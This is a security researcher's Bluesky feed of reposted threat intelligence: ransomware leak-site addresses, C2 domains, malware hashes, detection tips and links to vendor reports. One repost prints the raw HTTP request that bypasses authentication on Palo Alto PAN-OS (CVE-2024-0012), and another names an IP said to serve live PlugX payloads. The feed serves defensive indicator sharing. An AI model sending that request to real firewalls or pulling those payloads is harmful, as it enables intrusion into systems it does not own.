Mimi_Sec
mimisec.bsky.social
Ol' USAF Cyber. Ima say it. Own views. I learned I don't know anything. He/Him. Just the plumber.
Pinned
Just gonna reiterate I'll be the first to admit I don't know much, but if anyone ever needs any help in learning infosec type stuff, I'm all for lending a hand 😀 (also if I don't know the immediate answer, I'll learn right along with you.)
Credit: AlvieriD

Bluebox Ransomware DLS

zu3wfrmrkl4ltqqnpt3owp3cwa33rqwod4gpe3ttb5o4vf2is2gzm6qd[.]onion
December 11, 2024 at 1:51 PM
SocGholish Domain:

*.material[.]amstillroofing[.]com
December 10, 2024 at 7:40 PM
Reposted by Mimi_Sec
"We can now share that our latest investigation also found links between some of Doppelganger’s activities and individuals associated with MGIMO (Moscow State Institute of International Relations)."

via Meta/PDF: scontent.fotp7-2.fna.fbcdn.net/v/t39.8562-6...
December 4, 2024 at 10:49 PM
Reposted by Mimi_Sec
Research_Reports.zip 6a15b145267baf3c492af4a9e8ee4f244ee5070f9a02e5516c12d78bcd60e4ff
interesting, using a domain name that isn't registered ... perhaps a typo? #apt #bitter
December 4, 2024 at 8:35 PM
Reposted by Mimi_Sec
decoy on Security_Alert-US_MISSION_TO_PAKISTAN.pdf.lnk, beat by yogesh across the river by 31 minutes 😐
c2 vorm.vormliebe[.]club
d60e979ee44c9dc16e36657ec3a41016627cc685965befed018058986dd5d45e
December 4, 2024 at 12:05 PM
Reposted by Mimi_Sec
More great examples why you need to give employees a trusted PDF tool
pdfskillspro[.]com
pdskillsapp[.]com
Literally uploads files to their servers while saying they don't.
December 4, 2024 at 12:33 PM
FunkSec Ransomware DLS

7ixfdvqb4eaju5lzj4gg76kwlrxg4ugqpuog5oqkkmgfyn33h527oyyd[.]onion
December 4, 2024 at 4:42 PM
Reposted by Mimi_Sec
I try to write technical blogs regularly on topics I’m interested in. Recently this has been a lot of reverse engineering, Bluetooth, and networking hacks. But there are many other goodies too!

As I’m invested in this aspect of bsky succeeding, here’s a thread of my posts. Comments encouraged!
December 2, 2024 at 6:54 PM
Reposted by Mimi_Sec
Initial Access Detection Opportunities
🖥️ Quickassist detection: x.com/mthcht/statu...
✉️High volume of external emails sent to a single recipient
💬Teams interaction with a foreign tenant x.com/mthcht/statu... x.com/hir3n_s/stat...
filter on usernames with IT, Help, Desk, support, Tech, Customer, Microsoft
November 29, 2024 at 9:14 AM
Reposted by Mimi_Sec
RomCom/Storm-0978 exploits Firefox and Windows zero days in the wild
Firefox 0day CVE-2024-9680 + Windows privilege escalation 0day CVE-2024-49039
welivesecurity.com/en/eset-rese...
November 27, 2024 at 7:56 AM
Reposted by Mimi_Sec
GET /php/ztp_gate.php/.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off

GTFO! Come on, they are laughing at us now.

labs.watchtowr.com/pots-and-pan...
Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
Note: Since this is 'breaking' news and more details are being released, we're updating this post as more details become available (and as we think of better memes). Mash that F5 key every so often fo...
labs.watchtowr.com
November 19, 2024 at 10:17 AM
Reposted by Mimi_Sec

New Helldown ransomware targets Windows and Linux systems, uses Zyxel firewall exploits for initial access

blog.sekoia.io/helldown-ran...
Helldown Ransomware: an overview of this emerging threat
Comprehensive Analysis of Helldown: Tactics, Techniques, and Procedures (TTPs) and Exploitation of Zyxel Vulnerabilities
blog.sekoia.io
November 19, 2024 at 10:43 AM
Reposted by Mimi_Sec
November 20, 2024 at 4:55 PM
Reposted by Mimi_Sec
🚨🇺🇸Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
darkwebinformer.com/sealevel-con...
Sealevel Construction Inc Has Been Claimed a Victim to RansomHub Ransomware
darkwebinformer.com
November 18, 2024 at 8:06 PM
Reposted by Mimi_Sec
The certificate on this malware caught my eye. 👀
Starts with Google Ad, malware signed by Microsoft, and ends in support scam.

It checks if Quickbooks is running, checks the day of week, tells you to call a "support" number before killing Quickbooks.

www.malwarebytes.com/blog/scams/2...
QuickBooks popup scam still being delivered via Google ads | Malwarebytes
When trying to download QuickBooks via a Google search, users may visit the wrong site and get an installer containing malware.
www.malwarebytes.com
November 18, 2024 at 5:42 PM
Reposted by Mimi_Sec
You all know what to do
November 18, 2024 at 3:06 PM
Reposted by Mimi_Sec
if plugx is your game, open dir with live payloads
103.43.18[.]71:88 #apt #malware
files archived here for homegamers github.com/StrikeReady-...
November 16, 2024 at 3:58 PM
Reposted by Mimi_Sec
#sidewinder #apt targeting singapore with "sg customs" lure
c2 advisories-sgcustoms.d0cumentview[.]info
40159fcfe9793a8a13111131e31f10eb1652343f6b9d172e2cadc821bc5f28fd (uploaded from SG)
NO-712024.docx
November 18, 2024 at 2:15 PM
Reposted by Mimi_Sec
Smokeloader keeps crawling its way back into the limelight. If you want a primer on it, I gave a public talk on it 2 years ago

www.youtube.com/watch?v=O69e...
Smokeloader: The Pandora’s box of tricks, payloads and anti-analysis - BSides Portland 2022
YouTube video by BSides Portland
www.youtube.com
November 16, 2024 at 3:42 AM
Reposted by Mimi_Sec
Using EclecticIQ’s analysis, I uncovered 39 additional domains linked to Chinese #ThreatActor #SilkSpecter, impersonating brands like IKEA, The North Face, Zalando and Zara.

Key IOCs:
trusttollsvg.js
collect.js

#ThreatIntel #OSINT #Scam #BlackFriday #Phishing

blog.eclecticiq.com/inside-intel...
November 18, 2024 at 10:59 AM
Reposted by Mimi_Sec
🚨New Ransomware Group, "Termite," has named their first 5 victims
termiteuslbumdge2zmfmfcsrvmvsfe4gvyudc5j6cdnisnhtftvokid[.]onion
November 17, 2024 at 7:51 PM
Reposted by Mimi_Sec
May 13, 2024 blogpost
It is common for malware to be signed with code signing certificates.

How is this possible? Impostors receive the cert directly and sign malware.

In this blog-post, we look at 100 certs used by #Solarmarker #malware to learn more.

squiblydoo.blog/2024/05/13/i...
Impostor Certificates
It is common for malware to be signed with code signing certificates. How is this possible? Impostors receive the cert directly and sign malware. In this blog-post, we look at 100 certs used by Sol…
squiblydoo.blog
November 17, 2024 at 1:33 PM
Said it once I'll say it again, UFO 50 and Animal Well are masterpieces worth every minute.
November 17, 2024 at 6:26 AM